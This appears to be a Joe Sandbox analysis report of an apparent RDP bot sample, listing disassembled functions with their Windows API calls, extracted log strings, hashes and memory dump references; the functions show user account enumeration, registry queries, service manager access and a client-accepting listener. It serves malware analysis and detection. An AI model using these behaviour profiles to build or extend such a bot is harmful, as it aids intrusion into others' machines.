Instruction ID: 29962f0adcd3e2c513f443755b1ba9e76e63a906b51857df36bc60fec2b21b6d
Opcode Fuzzy Hash: a4765926d0bec962e3b64301d7cbedd34045c1c1f3eb295a71ea3bfcd381612a
Instruction Fuzzy Hash: 07513A61E0CF03C2FB2047DAAC803BB62999F05374FA453B6D56E462F5DE6DF8859281

Function 00007FF7C1AB3452 Relevance: 27.2, APIs: 7, Strings: 11, Instructions: 241memorystringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C1AC8500,00000000,00000000), ref: 00007FF7C1AB349D
HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C1AC8500,00000000,00000000), ref: 00007FF7C1AB34AE

Part of subcall function 00007FF7C1AB4FC5: fopen.MSVCRT ref: 00007FF7C1AB500A
Part of subcall function 00007FF7C1AB4FC5: fseek.MSVCRT ref: 00007FF7C1AB5029
Part of subcall function 00007FF7C1AB4FC5: _errno.MSVCRT ref: 00007FF7C1AB503D
Part of subcall function 00007FF7C1AB4FC5: _errno.MSVCRT ref: 00007FF7C1AB5058

GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C1AC8500,00000000,00000000), ref: 00007FF7C1AB35DA
HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7C1AC8500,00000000,00000000), ref: 00007FF7C1AB35EB
strncpy.MSVCRT ref: 00007FF7C1AB372C
strncpy.MSVCRT ref: 00007FF7C1AB3743
strncpy.MSVCRT ref: 00007FF7C1AB37A2

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF7C1AB350D
mem_alloc, xrefs: 00007FF7C1AB3633
service, xrefs: 00007FF7C1AB345D
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB34E6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB3522
(path != NULL), xrefs: 00007FF7C1AB3514
5, xrefs: 00007FF7C1AB3505
[I] (%s) -> Done(path=%s), xrefs: 00007FF7C1AB3808
ini_load, xrefs: 00007FF7C1AB34DF, 00007FF7C1AB351B, 00007FF7C1AB3801
NULL, xrefs: 00007FF7C1AB37F2
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF7C1AB363A

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc$service
API String ID: 1423203057-455140666
Opcode ID: 0c4040bc13b4473816842c2c01a7f90aad89fd73181495c49a8827ecfb7b12ea
Instruction ID: 619ad546bdf83fd72d4934995831698c857979a89fb31608685dbb2397a4378b
Opcode Fuzzy Hash: 0c4040bc13b4473816842c2c01a7f90aad89fd73181495c49a8827ecfb7b12ea
Instruction Fuzzy Hash: 6BA1DEB2A0D6C685EB10EF15A410BBEAB51AF54BA4FC88133DE4D07785DEEDE585C320

Function 00007FF7C1AB9242 Relevance: 26.5, APIs: 3, Strings: 12, Instructions: 246registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32 ref: 00007FF7C1AB929C
RegQueryValueExA.KERNEL32 ref: 00007FF7C1AB93E4

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

NULL, xrefs: 00007FF7C1AB943E, 00007FF7C1AB96EC, 00007FF7C1AB96F8
[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF7C1AB9412
registry_get_value, xrefs: 00007FF7C1AB92B7, 00007FF7C1AB9310, 00007FF7C1AB9343, 00007FF7C1AB9376, 00007FF7C1AB93A9, 00007FF7C1AB940B, 00007FF7C1AB9556, 00007FF7C1AB96D4
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB9317, 00007FF7C1AB934A, 00007FF7C1AB937D, 00007FF7C1AB93B0
(value_sz != NULL), xrefs: 00007FF7C1AB93A2
(key != NULL), xrefs: 00007FF7C1AB933C
(root != NULL), xrefs: 00007FF7C1AB9309
[D] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB96DB
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF7C1AB9302, 00007FF7C1AB9335, 00007FF7C1AB9368, 00007FF7C1AB939B
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB955D
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF7C1AB92BE
(value != NULL), xrefs: 00007FF7C1AB936F

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: OpenQueryValuefflushfwrite
String ID: (key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
API String ID: 1980715187-910542497
Opcode ID: d0835e459e24803f0fc88d3623f82c6b27cbd4b40818c2261843bf474927eb5e
Instruction ID: cb150139cf4070f2a9f389c29e6dd7ba77d848f393274ea5e08b3f078a1d319f
Opcode Fuzzy Hash: d0835e459e24803f0fc88d3623f82c6b27cbd4b40818c2261843bf474927eb5e
Instruction Fuzzy Hash: F0A10CB094C68791FB21FF10A450BBDA650AF04764FD44233DE1E07691EEEEE989D326

Function 00007FFE126E3553 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 134memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE126E363E
HeapAlloc.KERNEL32 ref: 00007FFE126E3652
CreateThread.KERNEL32 ref: 00007FFE126E3694
EnterCriticalSection.KERNEL32 ref: 00007FFE126E36AA
LeaveCriticalSection.KERNEL32 ref: 00007FFE126E36D1
GetLastError.KERNEL32 ref: 00007FFE126E3721
GetProcessHeap.KERNEL32 ref: 00007FFE126E3752
HeapFree.KERNEL32 ref: 00007FFE126E3763

Strings

mem_alloc, xrefs: 00007FFE126E36F9
routine_accept, xrefs: 00007FFE126E357E, 00007FFE126E36DB, 00007FFE126E372E
[E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu), xrefs: 00007FFE126E3735
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE126E3700
[I] (%s) -> Server ready(ssock=0x%llx), xrefs: 00007FFE126E3585
[I] (%s) -> Client accepted(client=0x%llx), xrefs: 00007FFE126E36E2

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: Heap$CriticalProcessSection$AllocCreateEnterErrorFreeLastLeaveThread
String ID: [E] (%s) -> CreateThread(routine_rx) failed(client=0x%llx,gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Client accepted(client=0x%llx)$[I] (%s) -> Server ready(ssock=0x%llx)$mem_alloc$routine_accept
API String ID: 871770459-375624272
Opcode ID: a35f7812cbe923ef1c13f96ed7a61895abc7dbf494a667d0068b7b9070bf0b42
Instruction ID: 10dbbd6b4e5d5f569b165834080a1927e496cb6420d44e03b7d5153047ee8f65
Opcode Fuzzy Hash: a35f7812cbe923ef1c13f96ed7a61895abc7dbf494a667d0068b7b9070bf0b42
Instruction Fuzzy Hash: 1F513860A08E0381FF14DB27AC213B92251AF44BB8F1403B5D82E0B7F5EEEDE8568744

Function 00007FFE11507158 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE11506DD8
wcsncpy.MSVCRT ref: 00007FFE11506E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE11506E63
GetLastError.KERNEL32 ref: 00007FFE11506E75
wcslen.MSVCRT ref: 00007FFE115071F7
GetProcessHeap.KERNEL32 ref: 00007FFE11507207
HeapAlloc.KERNEL32 ref: 00007FFE11507218
GetProcessHeap.KERNEL32 ref: 00007FFE11507234
HeapAlloc.KERNEL32 ref: 00007FFE11507245
NetApiBufferFree.NETAPI32 ref: 00007FFE11507283
NetUserEnum.NETAPI32 ref: 00007FFE115072F9
GetProcessHeap.KERNEL32 ref: 00007FFE11507337
HeapAlloc.KERNEL32 ref: 00007FFE11507348
memcpy.MSVCRT ref: 00007FFE11507385
GetProcessHeap.KERNEL32 ref: 00007FFE1150738A
HeapFree.KERNEL32 ref: 00007FFE1150739B

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11507262
users_sync, xrefs: 00007FFE11506E80
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE11506E87
D, xrefs: 00007FFE11506DF5
mem_alloc, xrefs: 00007FFE1150725B

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: e6fe0ee4781e2237c5bc62fe353100c4409b81cbe2d675ec8ea1fbbadae9fa35
Instruction ID: e48aafdaf76cff61ad48d67b510ecddb485fba76ca2971f25d17ae0b93562917
Opcode Fuzzy Hash: e6fe0ee4781e2237c5bc62fe353100c4409b81cbe2d675ec8ea1fbbadae9fa35
Instruction Fuzzy Hash: 42513A76A09F4286EB50CF56E44436977A6FB84BA8F104179DA8D43778EF3CE848C710

Function 00007FFE11507151 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE11506DD8
wcsncpy.MSVCRT ref: 00007FFE11506E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE11506E63
GetLastError.KERNEL32 ref: 00007FFE11506E75
wcslen.MSVCRT ref: 00007FFE115071F7
GetProcessHeap.KERNEL32 ref: 00007FFE11507207
HeapAlloc.KERNEL32 ref: 00007FFE11507218
GetProcessHeap.KERNEL32 ref: 00007FFE11507234
HeapAlloc.KERNEL32 ref: 00007FFE11507245
NetApiBufferFree.NETAPI32 ref: 00007FFE11507283
NetUserEnum.NETAPI32 ref: 00007FFE115072F9
GetProcessHeap.KERNEL32 ref: 00007FFE11507337
HeapAlloc.KERNEL32 ref: 00007FFE11507348
memcpy.MSVCRT ref: 00007FFE11507385
GetProcessHeap.KERNEL32 ref: 00007FFE1150738A
HeapFree.KERNEL32 ref: 00007FFE1150739B

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11507262
users_sync, xrefs: 00007FFE11506E80
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE11506E87
D, xrefs: 00007FFE11506DF5
mem_alloc, xrefs: 00007FFE1150725B

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: 3470059c2842616e4c3d826050f24feff18f632955af285b30627b754c70067a
Instruction ID: cd971f2fcb348b4efe5cb1f0a5558dea084573a4813b223f7ac89f46e21c9eed
Opcode Fuzzy Hash: 3470059c2842616e4c3d826050f24feff18f632955af285b30627b754c70067a
Instruction Fuzzy Hash: D6513A76A09F4286EB50CF56E44436977A6FB84BA8F10417ADA8D43778EF3CE848C710

Function 00007FFE11507174 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE11506DD8
wcsncpy.MSVCRT ref: 00007FFE11506E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE11506E63
GetLastError.KERNEL32 ref: 00007FFE11506E75
wcslen.MSVCRT ref: 00007FFE115071F7
GetProcessHeap.KERNEL32 ref: 00007FFE11507207
HeapAlloc.KERNEL32 ref: 00007FFE11507218
GetProcessHeap.KERNEL32 ref: 00007FFE11507234
HeapAlloc.KERNEL32 ref: 00007FFE11507245
NetApiBufferFree.NETAPI32 ref: 00007FFE11507283
NetUserEnum.NETAPI32 ref: 00007FFE115072F9
GetProcessHeap.KERNEL32 ref: 00007FFE11507337
HeapAlloc.KERNEL32 ref: 00007FFE11507348
memcpy.MSVCRT ref: 00007FFE11507385
GetProcessHeap.KERNEL32 ref: 00007FFE1150738A
HeapFree.KERNEL32 ref: 00007FFE1150739B

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11507262
users_sync, xrefs: 00007FFE11506E80
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE11506E87
D, xrefs: 00007FFE11506DF5
mem_alloc, xrefs: 00007FFE1150725B

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: b48a3cf29118b728d3b0ab39b9842411041187bb3139c8856803f2542875e88e
Instruction ID: 9de65775c47f253ed2c922f8c13783a44ad7f8f8e61df3a1584b5c29da1ec295
Opcode Fuzzy Hash: b48a3cf29118b728d3b0ab39b9842411041187bb3139c8856803f2542875e88e
Instruction Fuzzy Hash: 2B513A76A09F4286EB50CF56E44436977A6FB84BA8F104179DA8D43778EF3CE848C710

Function 00007FFE1150715F Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32 ref: 00007FFE11506DD8
wcsncpy.MSVCRT ref: 00007FFE11506E06
LookupAccountNameW.ADVAPI32 ref: 00007FFE11506E63
GetLastError.KERNEL32 ref: 00007FFE11506E75
wcslen.MSVCRT ref: 00007FFE115071F7
GetProcessHeap.KERNEL32 ref: 00007FFE11507207
HeapAlloc.KERNEL32 ref: 00007FFE11507218
GetProcessHeap.KERNEL32 ref: 00007FFE11507234
HeapAlloc.KERNEL32 ref: 00007FFE11507245
NetApiBufferFree.NETAPI32 ref: 00007FFE11507283
NetUserEnum.NETAPI32 ref: 00007FFE115072F9
GetProcessHeap.KERNEL32 ref: 00007FFE11507337
HeapAlloc.KERNEL32 ref: 00007FFE11507348
memcpy.MSVCRT ref: 00007FFE11507385
GetProcessHeap.KERNEL32 ref: 00007FFE1150738A
HeapFree.KERNEL32 ref: 00007FFE1150739B

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE11507262
users_sync, xrefs: 00007FFE11506E80
[E] (%s) -> LookupAccountNameW failed(gle=%lu), xrefs: 00007FFE11506E87
D, xrefs: 00007FFE11506DF5
mem_alloc, xrefs: 00007FFE1150725B

Memory Dump Source

Source File: 00000017.00000002.2670352719.00007FFE11501000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000017.00000002.2670300102.00007FFE11500000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670395714.00007FFE11514000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670436655.00007FFE1151D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670469724.00007FFE11520000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000017.00000002.2670500365.00007FFE11521000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11500000_main.jbxd

Similarity

API ID: Heap$AllocProcess$Free$AccountBufferEnumErrorLastLocalLookupNameUsermemcpywcslenwcsncpy
String ID: D$[E] (%s) -> LookupAccountNameW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$users_sync
API String ID: 2122475568-588975189
Opcode ID: e43c42e55178450ae885b42b15bceb4faee95b3f056309534d07b306d870700e
Instruction ID: 521ba86d37b1f206902b61260fda7a0156591585f67328cb6cb053d4d3c2b738
Opcode Fuzzy Hash: e43c42e55178450ae885b42b15bceb4faee95b3f056309534d07b306d870700e
Instruction Fuzzy Hash: 76513A76A09F4286EB50CF56E44436977A6FB84BA8F10417ADA8D43778EF3CE848C710

Function 00007FFE11BD8B63 Relevance: 24.6, APIs: 4, Strings: 10, Instructions: 94COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11BD8B74
OpenSCManagerA.ADVAPI32 ref: 00007FFE11BD8B9E
GetLastError.KERNEL32 ref: 00007FFE11BD8BE6
GetLastError.KERNEL32 ref: 00007FFE11BD8CBE

Part of subcall function 00007FFE11BDC852: fwrite.MSVCRT ref: 00007FFE11BDC8FE
Part of subcall function 00007FFE11BDC852: fflush.MSVCRT ref: 00007FFE11BDC90A

Strings

P, xrefs: 00007FFE11BD8C6D
~, xrefs: 00007FFE11BD8C64
Done, xrefs: 00007FFE11BD8CEE
scm_init, xrefs: 00007FFE11BD8BCB, 00007FFE11BD8BF1, 00007FFE11BD8CC7, 00007FFE11BD8CF5
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu), xrefs: 00007FFE11BD8BF8
ServicesActive, xrefs: 00007FFE11BD8B92
, xrefs: 00007FFE11BD8C04
[I] (%s) -> %s, xrefs: 00007FFE11BD8CFC
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11BD8BD2
[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu), xrefs: 00007FFE11BD8CCE

Memory Dump Source

Source File: 00000017.00000002.2670554696.00007FFE11BD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000017.00000002.2670529835.00007FFE11BD0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670610717.00007FFE11BE6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670638860.00007FFE11BF0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670662364.00007FFE11BF3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2670694177.00007FFE11BF4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11bd0000_main.jbxd

Similarity

API ID: ErrorLast$CountCriticalInitializeManagerOpenSectionSpinfflushfwrite
String ID: $Done$P$ServicesActive$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_scm) failed(gle=%lu)$[E] (%s) -> OpenSCManagerA(SERVICES_ACTIVE_DATABASE) failed(gle=%lu)$[I] (%s) -> %s$scm_init$~
API String ID: 546114577-3142219161
Opcode ID: f56fc1782bac19320c22608419659dee0f339a9110204879ad83665987f711c4
Instruction ID: 78df930cd7b49f589299bb5b9f90a70b66bfb1eafa9e21989ec3448cc8f44ad7
Opcode Fuzzy Hash: f56fc1782bac19320c22608419659dee0f339a9110204879ad83665987f711c4
Instruction Fuzzy Hash: 5241E894A0DE07D1FF385F26A481FF812599F1437AF5434B6C50E862F1EE5EA8888301

Function 00007FFE126E3340 Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 101memorysleepCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FFE126E340C
HeapFree.KERNEL32 ref: 00007FFE126E341D
EnterCriticalSection.KERNEL32 ref: 00007FFE126E3441
LeaveCriticalSection.KERNEL32 ref: 00007FFE126E3464
EnterCriticalSection.KERNEL32 ref: 00007FFE126E34D1
Sleep.KERNEL32 ref: 00007FFE126E34F0
EnterCriticalSection.KERNEL32 ref: 00007FFE126E3502
GetProcessHeap.KERNEL32 ref: 00007FFE126E3520
HeapFree.KERNEL32 ref: 00007FFE126E3531
LeaveCriticalSection.KERNEL32 ref: 00007FFE126E3540

Strings

--TSCB--, xrefs: 00007FFE126E3374
[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE126E34BE
-VRSTVE-, xrefs: 00007FFE126E3365
KCIT, xrefs: 00007FFE126E335D
routine_tx, xrefs: 00007FFE126E34B7
, xrefs: 00007FFE126E3355

Memory Dump Source

Source File: 00000017.00000002.2671030736.00007FFE126E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE126E0000, based on PE: true

Associated: 00000017.00000002.2670977304.00007FFE126E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671084429.00007FFE126F0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671113512.00007FFE126F8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671163310.00007FFE126FB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2671195288.00007FFE126FC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126e0000_main.jbxd

Similarity

API ID: CriticalSection$Heap$Enter$FreeLeaveProcess$Sleep
String ID: $--TSCB--$-VRSTVE-$KCIT$[D] (%s) -> Dispatch an event(size=%u,timestamp=%lld,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$routine_tx
API String ID: 610085118-1825955162
Opcode ID: 0cb550570166a2a4872badf17f3a5e5ab9fa72c4712fd7e321002e22c2959e14
Instruction ID: 07176036c9dcc455b0537da498bcdb3869a5f615402631e40cff004a9d7909d9
Opcode Fuzzy Hash: 0cb550570166a2a4872badf17f3a5e5ab9fa72c4712fd7e321002e22c2959e14
Instruction Fuzzy Hash: 9D510761A09E52C2EB25CF57EC502B96360EF88BA0F1401B5DA4E47BF4EFBCE9558704

Function 00007FF7C1AB7166 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 154COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF7C1AB719A

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

GetLastError.KERNEL32 ref: 00007FF7C1AB72F9

Strings

[I] (%s) -> Done(path=%s,xpath=%s,xpath_sz=%llu), xrefs: 00007FF7C1AB71D5
(path != NULL), xrefs: 00007FF7C1AB71FA
(xpath_sz != NULL), xrefs: 00007FF7C1AB725D
fs_path_expand, xrefs: 00007FF7C1AB71CE, 00007FF7C1AB7201, 00007FF7C1AB7234, 00007FF7C1AB7264, 00007FF7C1AB7294, 00007FF7C1AB72C6, 00007FF7C1AB7307, 00007FF7C1AB73D4
(xpath != NULL), xrefs: 00007FF7C1AB722D
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB7208, 00007FF7C1AB723B, 00007FF7C1AB726B, 00007FF7C1AB729B
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB71F3, 00007FF7C1AB7226, 00007FF7C1AB7256, 00007FF7C1AB7286
[E] (%s) -> ExpandEnvironmentStringsA failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB730E
((*xpath_sz) > 0), xrefs: 00007FF7C1AB728D
[E] (%s) -> ExpandEnvironmentStringsA buffer is too small(path=%s,res=%lu,xpath_sz=%llu), xrefs: 00007FF7C1AB73DB
[E] (%s) -> Failed(path=%s,xpath_sz=%llu,err=%08x), xrefs: 00007FF7C1AB72CD

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
